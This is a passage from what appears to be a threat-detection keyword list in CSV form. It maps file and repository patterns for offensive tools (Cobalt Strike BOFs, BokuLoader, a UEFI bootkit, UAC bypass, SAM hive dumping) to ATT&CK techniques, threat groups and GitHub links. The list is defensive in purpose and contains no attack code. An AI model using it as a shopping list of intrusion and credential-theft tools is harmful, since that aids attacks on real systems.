T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*bof-rdphijack*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*bof-regsave *,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,0,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*BofRunnerOutput*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*BOFs*/SyscallsSpawn/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*Bofs/AssemblyLoader*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bof-servicemove *,offensive_tool_keyword,cobaltstrike,New lateral movement technique by abusing Windows Perception Simulation Service to 
achieve DLL hijacking code execution.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/ServiceMove-BOF,1,0,N/A,10,10,223,45,2022-02-23T07:17:38Z,2021-08-16T07:16:31Z -*bof-trustedpath-uacbypass*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file implementation for trusted path UAC bypass. 
The target executable will be called without involving cmd.exe by using DCOM object.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/TrustedPath-UACBypass-BOF,1,1,N/A,10,10,104,33,2021-08-16T07:49:55Z,2021-08-07T03:40:33Z -*boko.py *,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,0,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*bokoscanner.*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation 
tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*boku_pe_customMZ*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_customPE*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_dll*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_mask_*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_pe_MZ_from_C2Profile*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku_strrep*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku7/BokuLoader*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*boku7/HOLLOW*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/HOLLOW,1,1,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -*BokuLoader.cna*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*BokuLoader.exe*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*BokuLoader.x64*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*bolt://localhost:7687*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*Bonfee/CVE-2022-0995*,offensive_tool_keyword,POC,CVE-2022-0995 exploit,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/Bonfee/CVE-2022-0995,1,1,N/A,N/A,5,490,71,2022-03-27T09:07:01Z,2022-03-26T21:46:09Z -*BooExecutorImpl.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bootkit-rs.git*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*bootkit-rs-master*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*BorjaMerino*Pazuzu*,offensive_tool_keyword,Pazuzu,Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory. 
